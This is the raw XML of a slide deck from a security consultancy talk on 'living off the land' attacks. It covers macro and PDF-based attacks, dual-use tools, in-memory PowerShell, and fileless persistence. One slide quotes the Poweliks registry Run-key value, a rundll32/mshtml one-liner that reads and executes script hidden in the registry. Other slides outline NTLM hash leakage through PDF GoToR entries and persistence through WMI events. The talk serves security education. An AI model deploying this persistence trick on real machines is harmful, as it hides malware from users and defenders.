              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Persistence : Windows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A2D3-4E72-E643-9303-D69930D7C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6958" y="2479309"/>
            <a:ext cx="10897642" cy="4872403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In 2014 Trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Poweliks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> evolved and became registry based threat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers usually abuse Run Key to store path of malicious binary to be executed on system restart.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powelinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> inserted the whole malware into the registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208581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C39-167D-4642-BD7F-5A1CF2D0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958" y="1107709"/>
            <a:ext cx="11126242" cy="797291"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MNP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Ron Meyers, Dave Norris, Don Penny)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F59F5-A58D-A740-A0D6-071892FF91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060" y="2133599"/>
            <a:ext cx="10615540" cy="4789131"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1259725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4B72-8F36-6545-99C8-64EC4B56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Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Persistence : Windows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A2D3-4E72-E643-9303-D69930D7C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6958" y="2479309"/>
            <a:ext cx="10897642" cy="4872403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"(default)" = "[ENCRYPTED JAVASCRIPT]"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[NON-ASCII STRING]" = "rundll32.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>:\"\..\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0" err="1"/>
              <a:t>mshtml,RunHTMLApplication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t> \";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>(\"\74script language=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0" err="1"/>
              <a:t>jscript.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>&gt;\"+(new%20ActiveXObject(\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0" err="1"/>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>\")).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0" err="1"/>
              <a:t>RegRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>(\"HKCU\\software\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0" err="1"/>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>\\windows\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0" err="1"/>
              <a:t>currentversion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="0" dirty="0"/>
              <a:t>\\run\\\")+\"\74/script&gt;\")"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7149-2F1C-7940-ABEA-0F55A5A9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433" y="914400"/>
            <a:ext cx="8840242" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Persistence WMI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31EA-EAAA-8044-8728-1E77656F60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Windows Management Instrumentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI used Common Infrastructure Model (CIM) to represent “information”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI can be used to obtain remote system information. (DCOM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI is part of windows since early days of Windows NT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1269197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4D95-35F4-384B-A922-043CB0AF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Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Persistence: WMI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C7FA-4B0B-6F4E-80BB-8038D9DC1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6958" y="2285999"/>
            <a:ext cx="10897642" cy="5065713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eventing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Create notification for changes to systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Changes to Registry, Changes to a Folder etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notifications (Evil Laugh)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leverage this to gain persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO!!!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0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4D95-35F4-384B-A922-043CB0AF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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eventing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C7FA-4B0B-6F4E-80BB-8038D9DC1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6958" y="2285999"/>
            <a:ext cx="10897642" cy="5065713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DEMO!!!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25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9D2E-9341-CC46-AF93-653C36BBD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0400" y="3200400"/>
            <a:ext cx="10897642" cy="18129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You!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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49692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7FDA-AA2F-4C61-A1AC-4401632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958" y="1143000"/>
            <a:ext cx="8840242" cy="1235075"/>
          </a:xfrm>
        </p:spPr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5CB9-0A55-4932-8167-38855185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6958" y="2378075"/>
            <a:ext cx="10897642" cy="4784725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Sunny Jamwal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Senior Cybersecurity Consultant at MNP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Risk Assessments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>PCI QSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Reading, Travelling, Documentaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Noob Malware Analyst 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823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D1FF-E756-094C-96BB-82F2CAAC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958" y="914400"/>
            <a:ext cx="8840242" cy="1371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EAB7-B973-CD40-BE82-67335843A0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 – What is Living Off the Land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Categories - Living off the land techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non PE File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dual use Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Memory Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo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18850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D1FF-E756-094C-96BB-82F2CAAC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958" y="914400"/>
            <a:ext cx="8840242" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living Off the 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EAB7-B973-CD40-BE82-67335843A0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Leveraging in built System Tools for Malicious Purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hiding malicious scripts inside windows registry and WMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of the Off the shelf tools makes attribution harder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application whitelisting will not prevent misuse of dual-use tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Four Main Categories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non PE File Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dual use Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File-less Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File-less Persistence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8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78B9-B6BD-5E4A-A13C-9A7A90FF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PE File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5E2F-A5B8-714F-82AB-86EE838D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6958" y="2133599"/>
            <a:ext cx="10897642" cy="5218113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Documents with Macros</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require User interaction for execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exception was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Trojan.PPDropper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, PowerPoint file execution caused by hovering.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PDF Files embedded with malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>April 2018 Checkpoint discovered NTLM hash leakage by exploiting Dictionary object of PDF Files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More During DEMO!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email attachments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attachments are sent as ZIP file containing script files such as LNK, SCT and HTA files.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2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78B9-B6BD-5E4A-A13C-9A7A90FF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PE File Attacks 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5E2F-A5B8-714F-82AB-86EE838D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6958" y="2133599"/>
            <a:ext cx="10897642" cy="521811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2E50C-497D-3442-82B8-AC7AEDC7D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2222499"/>
            <a:ext cx="9359900" cy="3950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A2E13A-1CC7-0949-8A39-7EB229FD6B17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046958" y="6934200"/>
            <a:ext cx="952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Source: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>research.checkpoint.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>-credentials-theft-via-pdf-files/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379941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78B9-B6BD-5E4A-A13C-9A7A90FF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PE File Attacks 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5E2F-A5B8-714F-82AB-86EE838D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6958" y="2133599"/>
            <a:ext cx="10897642" cy="5218113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dictionary Object is injected with “Malicious” Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0"/>
              <a:t>/S entry: Describes the type of action to be performed. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0" err="1"/>
              <a:t>GoTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0"/>
              <a:t> action changes the view to a specified destination within the document. The action types </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0" err="1"/>
              <a:t>GoToR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0"/>
              <a:t>, (Go To Remote) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0" err="1"/>
              <a:t>GoToE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0"/>
              <a:t> (Go To Embedded), both vulnerable, jump to destinations in another PDF file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0"/>
              <a:t>/F entry: Exists in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0" err="1"/>
              <a:t>GoToR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0" err="1"/>
              <a:t>GoToE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0"/>
              <a:t>, and has slightly different meanings for each. In both cases it describes the location of the other PDF. Its type is file specification.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" b="0" dirty="0"/>
              <a:t>/D entry: Describes the location to go to within the document.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C90C0-868F-F346-8A42-E3E203E876B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3046958" y="6934200"/>
            <a:ext cx="952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Source: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>research.checkpoint.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>-credentials-theft-via-pdf-files/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202333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78B9-B6BD-5E4A-A13C-9A7A90FF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PE File Attacks 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5E2F-A5B8-714F-82AB-86EE838D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6958" y="2133599"/>
            <a:ext cx="10897642" cy="521811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6831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MNP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F1E0C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="C2B9A6"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="035642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MNP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MNP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F1E0C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="C2B9A6"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="035642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MNP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10B7304EF4C41C4FBD2B472FD8009D45" ma:contentTypeVersion="1" ma:contentTypeDescription="Upload an image." ma:contentTypeScope="" ma:versionID="fc3e8b53696f0112102a09bfdd6222f5">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns1="http://schemas.microsoft.com/sharepoint/v3" xmlns:ns2="93E423E5-63F4-4FE5-80E1-BD6BAED4826B" xmlns:ns3="http://schemas.microsoft.com/sharepoint/v3/fields" xmlns:ns4="4e7f6a37-52bd-4bf3-b812-59f31e4e0bfc" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ffe618f193f04055b8150d274a3cb3ad" ns1:_="" ns2:_="" ns3:_="" ns4:_="">
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3"/>
    <xsd:import namespace="93E423E5-63F4-4FE5-80E1-BD6BAED4826B"/>
    <xsd:import namespace="http://schemas.microsoft.com/sharepoint/v3/fields"/>
    <xsd:import namespace="4e7f6a37-52bd-4bf3-b812-59f31e4e0bfc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E423E5-63F4-4FE5-80E1-BD6BAED4826B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f6a37-52bd-4bf3-b812-59f31e4e0bfc" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="SharedWithUsers" ma:index="2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93E423E5-63F4-4FE5-80E1-BD6BAED4826B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AF64FC-6F7F-4254-A592-91A4072AA7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3E423E5-63F4-4FE5-80E1-BD6BAED4826B"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/fields"/>
    <ds:schemaRef ds:uri="4e7f6a37-52bd-4bf3-b812-59f31e4e0b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8282B-9D5D-4FA5-8C4D-B9C161491C79}">
  <ds:schemaRefs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4e7f6a37-52bd-4bf3-b812-59f31e4e0bfc"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/fields"/>
    <ds:schemaRef ds:uri="93E423E5-63F4-4FE5-80E1-BD6BAED4826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7F23486-9E78-4485-A29D-FA39078415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4768</TotalTime>
  <Words>888</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>140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Title Slides</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>MNP (Ron Meyers, Dave Norris, Don Penny)</vt:lpstr>
      <vt:lpstr>Who Am I?</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Living Off the Land</vt:lpstr>
      <vt:lpstr>Non PE File Attacks</vt:lpstr>
      <vt:lpstr>Non PE File Attacks : DEMO</vt:lpstr>
      <vt:lpstr>Non PE File Attacks : DEMO</vt:lpstr>
      <vt:lpstr>Non PE File Attacks : DEMO</vt:lpstr>
      <vt:lpstr>Dual Use Tools</vt:lpstr>
      <vt:lpstr>Dual Use Tools : DEMO</vt:lpstr>
      <vt:lpstr>In Memory Attacks</vt:lpstr>
      <vt:lpstr>In Memory Attacks: PowerShell</vt:lpstr>
      <vt:lpstr>In Memory Attacks: PowerShell</vt:lpstr>
      <vt:lpstr>In Memory Attacks: PowerShell Demo</vt:lpstr>
      <vt:lpstr>In Memory Attacks: PowerShell Demo</vt:lpstr>
      <vt:lpstr>In Memory Attacks: PowerShell Demo</vt:lpstr>
      <vt:lpstr>Fileless Persistence</vt:lpstr>
      <vt:lpstr>Fileless Persistence : Windows Registry</vt:lpstr>
      <vt:lpstr>Fileless Persistence : Windows Registry</vt:lpstr>
      <vt:lpstr>Fileless Persistence WMI</vt:lpstr>
      <vt:lpstr>Fileless Persistence: WMI</vt:lpstr>
      <vt:lpstr>WMI Eventing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Meyers Norris Penny LLP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 Mitchell</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy/>
  <cp:revision>321</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-03-14T18:21:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-13T18:31:39Z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0x0101009148F5A04DDD49CBA7127AADA5FB792B00AADE34325A8B49CDA8BB4DB53328F2140010B7304EF4C41C4FBD2B472FD8009D45</vt:lpwstr>
  </property>
</Properties>
</file>